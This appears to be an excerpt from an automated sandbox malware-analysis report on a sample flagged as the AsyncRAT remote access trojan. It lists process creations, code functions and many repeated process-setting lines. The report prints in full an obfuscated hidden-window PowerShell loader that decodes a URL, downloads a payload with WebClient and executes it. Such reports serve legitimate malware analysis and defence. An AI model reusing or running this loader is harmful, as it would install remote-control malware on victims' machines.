NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. ';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsF
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. ';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFForese F.ageOmulcrLanitiJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. ';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD347E74FB push ebx; iretd 3_2_00007FFD347E756A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD347E756B push ebx; iretd 3_2_00007FFD347E756A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04B5E3B0 push eax; retf 6_2_04B5E3B1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04B5FE08 push esp; retf 6_2_04B5FE09
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07A008C2 push eax; mov dword ptr [esp], ecx6_2_07A00AC4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07A00AB8 push eax; mov dword ptr [esp], ecx6_2_07A00AC4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_023036CD push ebx; iretd 10_2_023036DA

        Boot Survival

        barindex
        Yara detected AsyncRAT
        Source: Yara matchFile source: 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5892, type: MEMORYSTR
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
